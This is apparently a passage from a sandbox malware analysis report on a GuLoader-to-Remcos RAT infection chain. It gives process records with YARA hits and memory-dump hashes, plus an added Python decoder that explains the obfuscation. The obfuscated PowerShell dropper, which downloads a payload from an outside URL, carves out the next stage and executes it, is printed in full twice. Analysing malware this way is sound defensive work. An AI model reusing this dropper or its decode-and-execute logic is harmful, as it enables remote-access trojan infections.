Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. 
,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA 
laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"
                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1853583088.00000223CEB82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true
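
The PowerShell command line recorded above is the GuLoader download stage. Every real string is hidden inside a junk-word literal, and the function Katukina rebuilds it by starting at index 4 and keeping every fifth character; Myndiges then runs a decoded string through the dot-call of $Butleress, which itself decodes to iEX. What follows is an added example, not code from the report or from the sample: a Python re-implementation of that decoder applied to literals copied verbatim from the Target ID 1 command line, plus a helper that reproduces the script's last step (Base64-decode the downloaded file, read it as ASCII, take the Substring at $Planeta=299772 for $Makrokaldene218=31361 characters, and hand the result to IEX) on a constructed blob. The constructed blob, its offset and its stage text are assumptions. One caveat for anyone who copies strings out of a rendered report rather than out of the .vbs itself: several literals on this page (the second Sylterne fragment and the New-Object assignment, for instance) no longer decode cleanly, evidently because runs of spaces were collapsed in rendering; the ones used below were checked to decode to a consistent result.

```python
# Added example (not from the report or the sample): Python version of the
# Katukina string decoder used by the PowerShell stage above, applied to
# literals copied from the Target ID 1 command line, plus the final
# "carve the next stage out of the downloaded blob" step on a constructed blob.
import base64


def katukina(s: str) -> str:
    """Python version of the PowerShell function Katukina from the command line.

    The original starts at index 4 and appends every fifth character until the
    index runs off the end of the string:
        $i = 4; do { $out += $s[$i]; $i += 5 } until (!$s[$i])
    which is exactly the slice s[4::5].
    """
    return s[4::5]


# Obfuscated literals copied verbatim from the Target ID 1 command line. The two
# Katalogbestilling fragments are joined with += in the script; the Injuriesag
# literal is wrapped over two lines in the report text and is rejoined here.
OBFUSCATED = {
    "Katalogbestilling": " ovlnTommE ejutAppe.BesvW" + "B kkEAff.BU secSnitLBajai FilEFor nNonrT",
    "Sylterne (first fragment)": "FortM S joSirezAnbeiSkablThrol,hroaOpre/",
    "Nonagricultural": "Non TSnerlStarsRuff1Revi2",
    "duplicand": "Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl",
    "Konfigurationsmanualers": "JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T",
    "Injuriesag": "MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata",
    "Taxiflyene192": "P.em>",
    "Butleress": " Auti eroE D vX",
    "asymptotes assignment": "Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs",
}


def decode_all(obfuscated=OBFUSCATED) -> dict:
    """Decode every literal. PowerShell is case-insensitive, so the mixed case
    of the results (nEt.WEBcLiEnT, USER-aGenT, iEX) is cosmetic."""
    return {name: katukina(value) for name, value in obfuscated.items()}


def ascii_get_string(raw: bytes) -> str:
    """Mimics [System.Text.Encoding]::ASCII.GetString, which turns every byte
    above 0x7F into '?' instead of raising."""
    return bytes(b if b < 0x80 else 0x3F for b in raw).decode("ascii")


def carve_stage(blob_b64: bytes, offset: int, length: int) -> str:
    """The script's last statements: Base64-decode the downloaded file, read it
    as ASCII text, then .Substring(offset, length) and IEX the result. The
    sample uses $Planeta=299772 and $Makrokaldene218=31361. .NET's Substring
    throws when the window runs past the end of the text, so a truncated
    download yields no stage at all; this helper fails the same way."""
    text = ascii_get_string(base64.b64decode(blob_b64))
    if offset < 0 or length < 0 or offset + length > len(text):
        raise ValueError("substring window lies outside the decoded blob")
    return text[offset:offset + length]


# Constructed stand-in for the downloaded file (an assumption; the real blob is
# not on this page, and a real stage would be the loader, not a one-liner).
STAGE_TWO = "Write-Host 'constructed stage two'"
SAMPLE_OFFSET = 200
SAMPLE_BLOB = base64.b64encode(("A" * SAMPLE_OFFSET + STAGE_TWO + "B" * 40).encode("ascii"))


if __name__ == "__main__":
    for name, plain in decode_all().items():
        print(f"{name:26s} -> {plain.replace('http', 'hxxp')}")
    print("carved:", carve_stage(SAMPLE_BLOB, SAMPLE_OFFSET, len(STAGE_TWO)))
```

Run as a script, decode_all() shows what the junk words hide: Katalogbestilling is Net.WebClient (the script does New-Object System.Net.WebClient), Konfigurationsmanualers is User-Agent and Sylterne its Mozilla/ Firefox value, Nonagricultural is Tls12 and duplicand the statement that assigns it to [Net.ServicePointManager]::SecurityProtocol, Taxiflyene192 is the > separator on which the URL list is split, and Injuriesag is the download URL hxxps://of1x[.]icu/CACZkcPf/Schmeer.aca. The asymptotes assignment resolves the drop path to $env:APPDATA plus the clear-text $overgreasiness='\Wealthmaking.Asr'. The script keeps calling DownloadFile with Start-Sleep 4 between attempts until Test-Path on that file succeeds, then runs carve_stage's PowerShell equivalent on it; the Target ID 3 record is the same script relaunched in the SysWOW64 PowerShell.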

                                                                                                                              Target ID:2
                                                                                                                              Start time:00:41:00
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:00:41:10
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. 
Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. 
,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge recrPergnCompe');$Frivoliteten142=Katukina 'Teks$ BotUFrkht AnfiProtl Fo bThesj ElgeOpnalP epiRet,gTran.UndiDDechoVu kwblsdn MillVggeoImmaaE sodP odFDueliLandlT gseData( He $Ski I.ermnHypojRegiuEularWondi RejesystsPiezaShamgWine,Comp$Boc MbanqoLydidHetevencaiFinanVaredTonse ontnSpid)';$Modvinden=$asymptotes;Myndiges (Katukina 'M.no$OpsugSediLgramO oodBN miaaab.LRoma:Su pDDaemeDecoTMaskABufoi TanLAudisKal tCrocUSkruDHatiI TjsE Ex.2Merc3Un i9o.er=Taen(Du,aTIsotESulfSHaanT Und-hyppp FruaMisstBaroH Awk s nd$ DozmBirsoSelvD aryV peaIUnepNS,ruDC ltEPicaN ,pl)');while (!$Detailstudie239) {Myndiges (Katukina 'Mois$Er lg ndklKonso Telb bnoaRadil Sur:FullSBrdfmUdryaUnculanhehFeriac sslUnaws gleegrupnSpigsU vi=Tri,$sandE rekfbankf njaeEn.in') ;Myndiges $Frivoliteten142;Myndiges (Katukina 'DelfsRo fTMatraNecrRBuegtRejs-ApplSU siLGla.eTituE Ra,pBrs For4');Myndiges (Katukina 'Heft$KombgLux.lFainoSexcB redA.nhaLForm:,advD PeteEuphtK otABefaiOpgalPakkSSolftAandu .enDMe aI No.E Do.2Over3Poli9 ri= ele(WhenTfilmEK stSBortT ul- BrepDebrAK,hotMen,H Pos Pe,u$NatimManioJo,dDAtteVWasti equnFo sD PhoeM stN U d)') ;Myndiges (Katukina ' oko$PseuG Disl ovoKonobAssea To.LSien:Sccjp Skrrops EOutseSwardUtiluKobbc arbaMesoTWhemePre dNedr=Gang$UningConcLEthnOPrecbS ccaHemiLAthl:LeveG K peAudiOIndbT VanrPhreoMiskpPolyITa.ssForumBer +Kred+Grov%Vile$ModecTeknHJadeoGranklgtnSFrusTForuA.harRPanhT,owlEStarrTvrenMobbEViol.TarocFo ooI dhUInten O et') ;$Injuriesag=$Chokstarterne[$Preeducated]}$Planeta=299772;$Makrokaldene218=31361;Myndiges (Katukina 'Vand$KortG BrnLslavOM ttBstorAA skLTiam:Di,ii AffD.kulyA 
laXPr.eKSrmrADggeT ekAInteLAc ioCairgSkureEyesR Hal Fja= rfe Vi.GBedueTrimtAfsl-ReteC UnmOPatenKultTProcETmreN let Bri Axin$,stemB reOMis,DB civGaudIShouNti tDB evESprjN');Myndiges (Katukina 'Exin$SnusgStral ZefoEnorb xya D,jl Omb:SterPDiscr Dego UsirLockeSubcxtu f Fors= Sta Semi[GumiSCeney PrisIdrttS lpeEx lmPark.GlosCKanooPe.cnAffiv pane delrF,rhtheks]Pers: wro:SammF CherIlmaoDisim Un BMus aStras Reke etr6vrng4 EmpSTelet Bl rNulzinonpnSalogPear(Bran$PeriIUnatdHer yForsx TilkDemia UnctAlk aI.eqlEurooSk.agFremeSkrarFaja)');Myndiges (Katukina 'Gra $,albgTripl reo UniBSe saErfaL C m:Rapij rbeA eeVS,teATilbnDaane aure lu6Tunn7Op n V.sc=Sand Besa[AfhoS NapyGlutsMiscTS.eae inuMfej . HertCroce VagXSkaltMe.v. DeseS ifNChilCRepoOEgetd KenImodsnHa dGs vk]Ant,: O s:G.ayaAnt s AddCBra,i R bISkr .Ge oGJenhEIndsTAnimsUndeT UndRAdspiNonwnUnwhgD.ta(Hy o$HovePMi,lR NovoIndlRUds Ew,neXIndr)');Myndiges (Katukina 'Offi$BrutgpettLBolioBandbano,aMajoLFly :AffakCentA Sktl,attDSkaaaLim,E GrueSkrmrRampeProa= her$ P.lj B raGen VFremaRetinHalmePresEgro,6 .ot7Mure. SupsImpuU KonB FugsLossT BelRMenaiDiscNAs,igFlos(Modu$Unmip Pa lfarmaPropn MimEViolT,ervAMeni,De.e$ToptmInteaBakskA ocr TknOEm.iKStifaSkylL excdBa,oESecrn Crie Hjh2Fo,m1Zing8 For)');Myndiges $Kaldaeere;"
                                                                                                                              Imagebase:0x350000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2057052918.0000000008E20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2057477084.000000000A0B8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2036593483.000000000604E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:00:41:10
                                                                                                                              Start date:23/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 00:41:32
Start date: 23/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0xef0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2169804742.0000000006DBD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 9
Start time: 00:41:46
Start date: 23/12/2024
Path: C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\Remcos\remcos.exe"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: high
Has exited: true

Target ID: 10
Start time: 00:41:56
Start date: 23/12/2024
Path: C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\Remcos\remcos.exe"
Imagebase: 0x1f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 00:42:05
Start date: 23/12/2024
Path: C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\Remcos\remcos.exe"
Imagebase: 0x7ff71e800000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                                                                • Instruction Fuzzy Hash: 6C21C522F1EA4F4FE3A5A76C146557462C2EF89210B8A00FAE01CC76EBDE19ED014245
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a90d608df8d4d6ded824fe90a99eacc3e389afd2d7cce83ba3d969ac0a09378a
                                                                                                                                • Instruction ID: 6ea4b9368ea3c5ad0fdbadf63ed7830685eb20f4c2ef07e0c6dcf6e1346f3eab
                                                                                                                                • Opcode Fuzzy Hash: a90d608df8d4d6ded824fe90a99eacc3e389afd2d7cce83ba3d969ac0a09378a
                                                                                                                                • Instruction Fuzzy Hash: 2A113A21A0FAC90FE7A2E7688CA9865BBD1DF5631075D01FAC098CB2F3E908AC45C341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 25e20daacc1a8b9fcea8b40ef93959f41e93aacfcbd1294e8823d0cae9115326
                                                                                                                                • Instruction ID: 3bd8779eb9b3799293d8cf399a45fd0f03e31ed18f88e499e0adb5acb620e434
                                                                                                                                • Opcode Fuzzy Hash: 25e20daacc1a8b9fcea8b40ef93959f41e93aacfcbd1294e8823d0cae9115326
                                                                                                                                • Instruction Fuzzy Hash: 8601D622F1FA9D0BEBB5A7682C255B865C1EF5C720B4E05FAE81CD32EBDD086D044281
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1869607605.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b760000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                • Instruction ID: 662e280c937e7ea4aa8bdaf3df67460d56bef4c90e85a80d25cee34920001367
                                                                                                                                • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                • Instruction Fuzzy Hash: 3C01677121CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC36A6DB36E881CB46
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 317a0b0e759f5379e8f3a0ae7cd513c8e4e9e05eb707cab656943bf1b31298fb
                                                                                                                                • Instruction ID: 59e6b4fb9b5971de6e5b3c77fd00067de2ce84e09b14ea2a396b0e57134bd14f
                                                                                                                                • Opcode Fuzzy Hash: 317a0b0e759f5379e8f3a0ae7cd513c8e4e9e05eb707cab656943bf1b31298fb
                                                                                                                                • Instruction Fuzzy Hash: E6E02233B5AD0D0EE795A76C54245F9B3D2EFC8132B5A42B3D51EC32A6ED21D80B4380
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0b0097d432e837163f7c23227cc9c09e96ea0dc4fbc8a4339724bb2c560d0d15
                                                                                                                                • Instruction ID: 4abe4f7fd8a30278a95a40f07ecef6fce00fbbfeaf5d8980056c57d8f2091f33
                                                                                                                                • Opcode Fuzzy Hash: 0b0097d432e837163f7c23227cc9c09e96ea0dc4fbc8a4339724bb2c560d0d15
                                                                                                                                • Instruction Fuzzy Hash: EDE0D853F0FA8A4FEB94B73C18690A866D1EFE965071504BBD04CC71EFDD185D094341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000001.00000002.1870128916.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_1_2_7ffd9b830000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ed671fcf9fb144760f466dec3b41aa36b50a4b6e9303f694fc71d970a2a4f17d
                                                                                                                                • Instruction ID: deeeb15df3cafbc295aa5b217489f0f1d26f3554715e589fb850ccbe4c7d6a45
                                                                                                                                • Opcode Fuzzy Hash: ed671fcf9fb144760f466dec3b41aa36b50a4b6e9303f694fc71d970a2a4f17d
